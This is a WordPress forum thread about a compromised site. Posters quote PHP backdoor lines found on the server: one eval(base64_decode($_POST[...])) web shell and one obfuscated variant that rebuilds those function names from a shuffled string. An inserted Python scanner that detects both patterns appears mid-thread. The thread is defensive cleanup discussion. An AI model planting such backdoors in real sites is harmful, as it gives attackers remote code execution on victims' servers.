• Resolved GreywolfComputer

    (@greywolfcomputer)


    Installed free WordFence to evaluate on a site that gets a lot of SPAM comments/emails. Other than that, the site appears to be working fine with no problems. I allowed Wordfence to scan and received a warning on 12 files:

    This file may contain malicious executable code: This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans.

    I ftp’d my entire site folder to my computer to search through the files.

    Looking through the files, I see:

    <?php eval(base64_decode($_POST['nxxxxxx']));?>

    They are all the same line with the exception of what is between the quotes. They all start with “n” and have 6 letters and numbers after the “n”.

    I searched for file names or code inside of files for the content between the quotes, and the only place it occurs is in these suspicious files.

    I’m still researching this as a possible hack; but need some advice.

    https://www.ads-software.com/plugins/wordfence/

Viewing 7 replies - 16 through 22 (of 22 total)
  • So, are we good now? Or still infected? Getting clean is the most important thing.

    tim

    Thread Starter GreywolfComputer

    (@greywolfcomputer)

    I’ve been checking a couple times a day on every site and I don’t see anything. WordFence says I’m clean. As does Sucuri. Also, other web scans from the outside. So, I’m going to cautiously say yes.

    Thread Starter GreywolfComputer

    (@greywolfcomputer)

    Here is something interesting. In checking the WordFence Live Traffic and setting up blocks, etc. I see that one of the domains — a wordpress install I currently have with a homepage with a “coming soon” type message — is getting attempts from Russia to access files in actual directories in my hosting account; but which don’t reside under the domain/wordpress folder for that domain. Ex: https://www.mydomain.com/folder-that-holds-wordpress-folder-for-other-domain/wp-includes/user.php That would tell me someone saw the folders on the hosting account. The chance they saw MY ftp credentials is almost nil because I am the only one who uses it, has access to the password, and I use VERY secure passwords from a password generator/management program.

    I bet you’re right. I’m still leaning towards making GoDaddy move you to another shared host. This one sounds like bad news.

    tim

    Thread Starter GreywolfComputer

    (@greywolfcomputer)

    I’m going to work on that. And, I think, move some wordpress installs to renamed folders just in case.

    I have this code in a php file in the wordpress root directory:

    $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n2a3237'])) {eval($s21(${$s20}['n2a3237']));}?>

    The file name is wp-izkbowe.php,
    plus another 2, wp-qzausdb.php and wp-myfcdlb.php, but with 0 size.
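A defender-side file scanner for the two backdoor patterns shown in this thread, the one-line eval()/base64_decode() form from the first post and the index-shuffled form from wp-izkbowe.php; it is an added example, not code from the thread, from Wordfence or from any plugin named here. It goes a little beyond the posts: it resolves the $sF[n] character shuffling back to the names it hides and also flags the zero-size wp-*.php files. File paths and contents in SAMPLES are constructed from the snippets posted above.

```python
import re
# Rule 1, the Wordfence warning quoted in the thread: eval() and base64_decode() on one line.
PLAIN_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
# Rule 2, the wp-izkbowe.php variant: a short literal is assigned to a variable and
# function/superglobal names are rebuilt from single characters of it ($sF[4].$sF[5]...).
LITERAL_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
INDEX_RUN_RE = re.compile(r"(?:\$\w+\[\d+\]\s*\.?\s*){3,}")
INDEX_RE = re.compile(r"\$(\w+)\[(\d+)\]")
EVAL_RE = re.compile(r"\beval\s*\(", re.I)
SUSPECT = {"base64_decode", "gzinflate", "str_rot13", "_post", "_get", "_request", "_cookie"}

def rebuild_index_strings(source):
    """Resolve each run of $var[i].$var[j]... against the literal $var was assigned."""
    literals = dict(LITERAL_RE.findall(source))
    rebuilt = []
    for run in INDEX_RUN_RE.findall(source):
        try:
            rebuilt.append("".join(literals[v][int(i)] for v, i in INDEX_RE.findall(run)))
        except (KeyError, IndexError):
            continue  # indexes a variable whose literal we did not see; leave it alone
    return rebuilt

def scan_php(source):
    """Return a list of (line, reason); an empty list means nothing was flagged."""
    if not source.strip():  # Rule 3: the zero-size wp-*.php files mentioned in the thread
        return [(0, "empty PHP file, check why it exists")]
    findings = [(n, "eval() and base64_decode() on one line")
                for n, line in enumerate(source.splitlines(), 1) if PLAIN_RE.search(line)]
    names = {s.lower() for s in rebuild_index_strings(source)} & SUSPECT
    if names and EVAL_RE.search(source):  # whole-file finding, so line 0
        findings.append((0, "eval() with index-shuffled names: " + ", ".join(sorted(names))))
    return findings

# Constructed samples: the two snippets posted in the thread, an empty file and a benign one.
SAMPLES = {
    "wp-content/uploads/x.php": "<?php eval(base64_decode($_POST['nxxxxxx']));?>\n",
    "wp-izkbowe.php": '<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].'
                      '$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);'
                      '$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);'
                      "if (isset(${$s20}['n2a3237'])) {eval($s21(${$s20}['n2a3237']));}?>",
    "wp-qzausdb.php": "",
    "wp-content/plugins/ok/ok.php": "<?php echo base64_decode('aGVsbG8=');\n",
}

def scan_samples():
    """Map each sample path to its findings, keeping only the flagged files."""
    results = {path: scan_php(src) for path, src in SAMPLES.items()}
    return {path: f for path, f in results.items() if f}
```

Run over a real tree by replacing SAMPLES with the contents of every .php file under the WordPress root; a benign file that only calls base64_decode() without eval() is not flagged.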

    manilLons

    (@manillons)

    Hi,

    Thank you for your help. I just had the same attack on my website.
    I used this plugin to find the infected files: WP Antivirus Site Protection (by SiteGuarding.com)
    The free version shows you the names of the files but hides their paths. But with some searching by name or date in FileZilla it was easy to find them all and delete them. Some wordpress core files were infected too (in wp-includes/). I had to replace them with “new” ones from a clean wordpress download.

    More than 100 files to manage… but it seems ok now. The most infected folders were backwpup, simplepie (which I didn’t remember being installed…), tinymce, and revslider.

    Hope that helps.

  • The topic ‘Possible Hack of my site’ is closed to new replies.